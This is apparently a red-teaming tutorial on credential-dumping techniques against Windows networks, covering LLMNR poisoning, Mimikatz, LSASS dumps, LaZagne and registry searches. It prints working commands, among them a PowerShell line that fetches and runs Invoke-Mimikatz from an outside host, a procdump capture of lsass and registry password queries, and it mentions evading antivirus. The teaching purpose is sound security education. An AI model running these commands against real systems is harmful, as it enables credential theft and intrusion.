Red Teaming: Credential dumping techniques
Credential dumping is a technique that allows obtaining account credentials and password information in the form of a clear text password or a hash from a single computer, Domain Controller server or software.
FREE role-guided training plans
LLMNR/NBT-NS Poisoning and Relay
Experts take advantage of LLMNR and NBT-NS protocols in an internal network to poison and relay authentication requests on the network and get the users’ hashes or simply a valid connection with a single machine within the context of the users’ session.
A set of tools can be used to reproduce this technique, such as NBNSpoof, Metasploit and Responder. By using the Responder tool, we can get a valid hash for the user: Charlie\John as demonstrated below.
In the next step, the hash can be brute-forced using john the ripper or hashcat tools.
(source)
After this point, lateral movement or simply accessing target machines is possible with the cracked hash account. On the other hand, if an NTLM hash is retrieved, it can be directly used via a Pass-the-Hash attack on the target, obtaining valid access.
Dumping creds using MimiKatz
Mimikatz is a classical tool used within the offensive vertice of cybersecurity, with the goal of getting clear-text passwords and hashes from memory. It can be executed in different ways, for example, by using a framework such as Metasploit or CobaltStrike, or simply using standalone scripts.
Next, we can see a command line responsible for downloading a PowerShell script (mimikatz) and executing it in memory.
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.1/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
As mentioned, this technique can be combined with other obfuscation layers and methods to bypass AV detection on the target machine. More details about this scenario can be found here.
Dumping creds without using MimiKatz
Mimikatz has a lot of signatures and is often detected by EDRs and AVs. If it is not used properly and with different layers of obfuscation, the TCP connection between the computer of the security expert and the target machine will be terminated or even blocked by the operating system. In short, this is a preventive mechanism to minimize the risks of a compromise as mimikatz is also a tool widely used by criminals during its malicious operations.
In this sense, if the security expert has RDP access to the target machine, the lsass.exe process can be dumped from the process tree. In detail, this process manages the user accounting and Windows policies. There are a lot of ways to do this, including:
- Creating a minidump by using task manager
- By using the legitimate program from Microsoft called: procdump.exe
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
After obtaining a dump of the lsass file, a Linux version of mimikatz (pypykatz) can be used in an offline manner from a Linux machine. The command to retrieve all the passwords and hashes from the lsass file is the following:
pypykatz lsa minidump /home/kali/Downloads/lsass.DMP
Getting everything with LaZagne
LaZagne is an open-source project used to retrieve passwords from everywhere. As each program uses its way of storing passwords, such as plaintext forms, API’s custom algorithms, etc., LaZagne is a tool capable of jumping the different barriers and getting passwords for the most commonly-used software with a single click.
More details about this tool on GitHub.
Become a Certified Ethical Hacker, guaranteed!
Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.
Credentials available in the Windows Registry
For decades malware has used this technique to collect passwords from the Windows registry after an infection. Although the most recent programs don’t store their passwords in the Registry, legacy infrastructure still does it. In this sense, the next few command lines can be a good friend and retrieve a lot of information from the registry:
reg query HKLM /f password /t REG_SZ /s# or
reg query HKCU /f password /t REG_SZ /s
Registry queries that include the “/f password” parameter should be monitored and blocked to prevent data exfiltration and thus improve the cybersecurity of the systems.
Sources:
- LaZange project, GitHub
- PypyKatz - Linux version of mimikatz, GitBook - Segurança Informática
- Dumping creds from memory, IredTeam
- LLMNR/NBT-NS Poisoning and Relay, Red Team Notes
In this Series
- Red Teaming: Credential dumping techniques
- Top 10 Linux distro for ethical hacking and penetration testing
- Penetration testing steps: How-to guide on pentesting
- How does automated penetration testing work?
- Intelligence-led pentesting and the evolution of Red Team operations
- Red Teaming: Taking advantage of Certify to attack AD networks
- How ethical hacking and pentesting is changing in 2022
- Ransomware penetration testing: Verifying your ransomware readiness
- Red Teaming: Main tools for wireless penetration tests
- Fundamentals of IoT firmware reverse engineering
- Red Teaming: Top tools and gadgets for physical assessments
- Red teaming: Initial access and foothold
- Top tools for red teaming
- What is penetration testing, anyway?
- Red Teaming: Persistence Techniques
- Top 6 bug bounty programs for cybersecurity professionals
- Tunneling and port forwarding tools used during red teaming assessments
- SigintOS: Signal Intelligence via a single graphical interface
- Top tools for mobile android assessments
- Top tools for mobile iOS assessments
- Red Team: C2 frameworks for pentesting
- Inside 1,602 pentests: Common vulnerabilities, findings and fixes
- Red teaming tutorial: Active directory pentesting approach and tools
- Red Team tutorial: A walkthrough on memory injection techniques
- Python for active defense: Monitoring
- Python for active defense: Network
- Python for active defense: Decoys
- How to write a port scanner in Python in 5 minutes: Example and walkthrough
- Using Python for MITRE ATT&CK and data encrypted for impact
- Explore Python for MITRE ATT&CK exfiltration and non-application layer protocol
- Explore Python for MITRE ATT&CK command-and-control
- Explore Python for MITRE ATT&CK email collection and clipboard data
- Explore Python for MITRE ATT&CK lateral movement and remote services
- Explore Python for MITRE ATT&CK account and directory discovery
- Explore Python for MITRE ATT&CK credential access and network sniffing
- Top 10 security tools for bug bounty hunters
- Kali Linux: Top 5 tools for password attacks
- Kali Linux: Top 5 tools for post exploitation
- Kali Linux: Top 5 tools for database security assessments
- Kali Linux: Top 5 tools for information gathering
- Kali Linux: Top 5 tools for sniffing and spoofing
- Kali Linux: Top 8 tools for wireless attacks
- Kali Linux: Top 5 tools for penetration testing reporting
- Kali Linux overview: 14 uses for digital forensics and pentesting
- Top 19 Kali Linux tools for vulnerability assessments
- Explore Python for MITRE ATT&CK persistence
- Explore Python for MITRE ATT&CK defense evasion
- Explore Python for MITRE ATT&CK privilege escalation
- Explore Python for MITRE ATT&CK initial access
- Top 18 tools for vulnerability exploitation in Kali Linux
- Explore Python for MITRE PRE-ATT&CK, network scanning and Scapy
Get certified and advance your career!
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, ISC2, Cisco, Microsoft and more!
Penetration testing
Top 10 Linux distro for ethical hacking and penetration testing
Penetration testing
Penetration testing
Penetration testing
Intelligence-led pentesting and the evolution of Red Team operations